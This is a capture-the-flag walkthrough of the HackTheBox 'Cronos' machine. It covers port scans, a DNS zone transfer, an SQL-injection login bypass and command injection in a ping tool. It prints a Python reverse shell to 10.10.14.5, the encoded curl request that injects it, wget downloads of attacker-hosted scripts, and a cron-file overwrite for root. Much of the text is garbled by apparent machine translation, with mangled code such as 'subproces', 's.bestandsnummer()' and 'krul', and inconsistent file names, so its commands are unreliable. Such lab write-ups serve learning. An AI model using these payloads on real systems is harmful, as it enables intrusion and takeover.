HackTheBox report — Chronos (2023)

Cronos is an engine that uses simple SQL injection and zone transfer to list its subdirectories. Privilege escalation is quite easy when we discover a PHP file owned by our low-privilege user.

nmap -T4 -p- 10.10.10.13

Run Nmap 7.70 (https://nmap.org) on Jun 1, 2020. at 11:57 a.m. EDT
Nmap scan report for 10.10.10.13
The host is active (0.054s latency).
Not shown: 65532 filtered ports
STATE LIGHT SERVICE
22/tcp Open SSH
53/tcp open domain
80/tcp opent httpNmap done: 1 IP address scanned (1 host active) in 113.93 seconds

Gates 22, 53 and 80 are open.

nmap -T4 -A -p22,53,80 10.10.10.13

Run Nmap 7.70 (https://nmap.org) 1.6.2020. at 12:07 p.m. EDT
Nmap scan report for 10.10.10.13
The host is active (0.051s latency).PORT SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; Protokoll 2.0)
| ssh-hostsleutel:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domein ISC BIND 9.10.3-P4 (Ubuntu Linux)
| DNS-NSID:
|_ bind.version: 9.10.3-P4-Free
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http header: Apache2 Ubuntu Default Page: Works
Warning: OSScan results can be unreliable because we couldn't find at least one open and one closed port
Aggressive Operating System Estimates: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92% ) %), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact host OS matches (test conditions not ideal).
Network distance: 2 hops
Service information: Operating mode: Linux; CPE: cpe://o:linux:linux_kernelTRACEROUTE (set to port 53/tcp)
HOP RTT ADRES
1 51,10 ms 10.10.14.1
2 51,18 ms 10.10.10.13Discovery of operating system and service performed. Please report incorrect results belowhttps://nmap.org/submit/.
Nmap done: 1 IP address scanned (1 host active) in 19.88 seconds

Whenever I see a web server I run a Nikto scan and brute force the directory.

nobody -h 10.10.10.13

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -uhttp://10.10.10.13> gobuster.txt

Unfortunately, we don't find much, as you can see below.

The web server shows us a standard Apache page. Maybe there is a problem with DNS?

Using nslookup we were able to find the nameserver for cronos.htb:

to look up

Server 10.10.10.13

nslookup 10.10.10.13

We also do a zone move to see if there are any other domains.

host -l cronos.htb 10.10.10.13

(Video) HackTheBox Walkthrough - Cronos

ns1.cronos.htb

cronos.htb

admin.cronos.htb

Let's add this to our /etc/hosts file,

echo „10.10.10.13 chronos.htb“ >> /etc/hosts

echo „10.10.10.13 admin.cronos.htb“ >> /etc/hosts

by a visithttp://cronos.htbIhttp://admin.cronos.htbCheck out what we're bringing back!

From here we can restart the brute force directory and Nikto scan on both domains.

nobody -h cronos.htb

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -uhttp://cronos.htb

nobody -h admin.cronos.htb

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -uhttp://admin.cronos.htb

We immediately notice that we get different results:

Gobuster v1.4.1 PB Reeves (@Colonial)
============================================== == =
============================================== == =
[+] mode: red
[+] URL/domain:http://cronos.htb/
[+] Homework: 10
[+] Glossary: ​​/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Statuscodes: 302.307.200.204.301
============================================== == =
/css (Status: 301)
/js (Status: 301)
============================================== == =Gobuster v1.4.1 PB Reeves (@Colonial)
============================================== == =
============================================== == =
[+] mode: red
[+] URL/domain:http://admin.cronos.htb/
[+] Homework: 10
[+] Glossary: ​​/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Statuscodes: 204.301.302.307.200
============================================== == =
Nothing
============================================== == =
Nikto v2.1.6
-------------------------------------------------- ---------------------------------------
+ Target IP: 10.10.10.13
+ Target hostname:admin.cronos.htb
+ Soul Gate: 80
+ Start time: 01/06/2020 13:21:07 (GMT-4)
-------------------------------------------------- ---------------------------------------
+ Server: Apache/2.4.18 (gratis)
+ The "X-Frame-Options" anti-click-catching header is not present.
+ The X-XSS-Protection header is not defined. This header can provide advice to the user agent to protect against certain forms of XSS
+ The X-Content-Type-Options header is not set. This allows the user agent to render the content of the web page in a non-MIME-like manner
+ PHPSESSID cookie created without the httponly tag
+ No CGI directories found (use "-C all" to force checking all possible directories)
+ Server loses inodes via ETags, header with file/found, fields: 0x30a6 0x555402443a52b
+ The web server returns a valid response using unsolicited HTTP methods, which may result in false positives.
+ /config.php: PHP configuration file can contain database ID and password.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7499 requests: 0 errors and 8 items reported on remote host
+ End time: 01/06/2020 13:29:36 (GMT-4) (509 seconds)
-------------------------------------------------- -------------------Nikto v2.1.6
-------------------------------------------------- ---------------------------------------
+ Target IP: 10.10.10.13
+ Target hostname:cronos.htb
+ Soul Gate: 80
+ Start time: 01/06/2020 13:02:19 (GMT-4)
-------------------------------------------------- ---------------------------------------
+ Server: Apache/2.4.18 (gratis)
+ The "X-Frame-Options" anti-click-catching header is not present.
+ The X-XSS-Protection header is not defined. This header can provide advice to the user agent to protect against certain forms of XSS
+ The X-Content-Type-Options header is not set. This allows the user agent to render the content of the web page in a non-MIME-like manner
+ XSRF-TOKEN cookie created without httponly tag
+ No CGI directories found (use "-C all" to force checking all possible directories)
+ Server loses inodes via ETags, headers found with /robots.txt file, fields: 0x18 0x54cae721c43bb
+ Allowed HTTP methods: GET, HEAD
+ OSVDB-3092: /web.config: ASP configuration file is accessible.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7445 requests: 0 errors and 8 items reported on remote host
+ End time: 01.06.2020 13:11:57 (GMT-4) (578 seconds)
-------------------------------------------------- -------------------

Not much has come out of these scenarios, that's where our focus ishttp://admin.cronos.htb.

We can try to apply administrative credentials, but we already know that this site is vulnerable to SQL injection. On the sheet below, we enter it in the "Username" field and we get administrative access.

By clicking Submit, we gain access.

From here we can find Net Tool v0.1, this tool gives access to "traceroute" and "ping" commands. Let's see if we can run more commands with ping or traceroute.

We're tracking traceroute 8.8.8.8, Google's DNS server, and trying to ping it.

We have set up a listener using tcpdump on the tun0 interface.

Since our IP address on this interface is 10.10.14.5, we will ping this IP address.

As you can see, the number of ping requests is increasing.

Let's load Burp and build a reverse shell by intercepting requests and see what we get back each time.

As you can see, these requests are "URL encoded". We need to code our reverse shell url to farm and send the request.

It looks like we have Python on the computer, so we'll use Python's reverse shell.

(Video) HackTheBox - Cronos | Noob To OSCP Episode #12

python -c 'import socket,subproces,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",443));os.dup2(s.bestandsnummer(),0); os.dup2(s.bestandsnummer(),1); os.dup2(s.fileno(),2);p=subproces.call(["/bin/sh","-i"]);'

We connect to our IP through port 443.

Set up a listener and replace the ping request with the above code in burp. Make sure to URL encode using CTRL + U and repeater.

We send a request and we are blessed with a shell!

I have copied the request below into the curl command.

krul -i -s -k -X $'POST' \
-H $'Host: admin.cronos.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0' -H $'Accept: text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referrer:http://admin.cronos.htb/welcome.php'-H $'Cookie: PHPSESSID=mpi2m3tie7smsrcbgrfs91si75' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content length: 279' \
-b $'PHPSESSID=mpi2m3tie7smsrcbgrfs91si75' \
--data-binary $'command=traceroute&host=8.8.8.8+%26+python+-c+\'import+socket,subproces,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect( (\"10.10.14.5\",443))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno (),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\'' \
$'http://admin.cronos.htb/welcome.php'

Let's update the shell with the following command:

python -c 'uvoz pty; pty.spawn("/bin/bash")'

STRG + Z

e.g

Once you type "fg + ENTER" after CTRL + Z, the shell will be updated to a fully interactive shell.

Let's use LinEnum.sh to see how we can raise our privileges to root. To do this, we put LinEnum.sh in our local directory and host an HTTP server. We download it from our victim's machine to the current user's home directory.

python3 -m http.server 80

wgethttp://10.10.14.5/LinEnum.sh

chmod +x LinEnum.sh

(Video) Hack The Box Cronos - Walkthrough

From here we can run the script.

./LinEnum.sh

In the script, we notice that the PHP page is running as a cron job in the www directory. We as users of WWW data are interested in this.

Let's see if we have RW permissions for this file - /var/www/laravel/artisan

Surprise! We own it..

Let's turn the contents of this file into a reverse shell, set up a listener... and have root run a cron job, which (hopefully) gives us a reverse shell with root-level access.

We copied the reverse shell to our local directory at /usr/share/webshells/php/php-reverse-shell.php, renamed the file to rev.php and changed the parameters in it to our own IP/PORT which we use for the shell.

cp /usr/share/webshells/php/php-reverse-shell.php.

mv php-reverse-shell rev.php

Let's put the file on a local HTTP server and download it to our victim's /tmp directory. From here we will rename it to the name of the PHP page we are going to replace. Make sure to set the listener to the desired port.

python3 -m http.server 80

cd /tmp

wgethttp://10.10.14.5/rev.php

mv rev.php Master

nc -nlvp 444

The last step is to move the file to the destination folder and wait for the cron job to run. According to the cron job, we found out that it is /var/www/laravel/.

cp artisan /var/www/laravel/

(Video) HackTheBox - CronOS Conquered!

Root.txt is located at /root/root.txt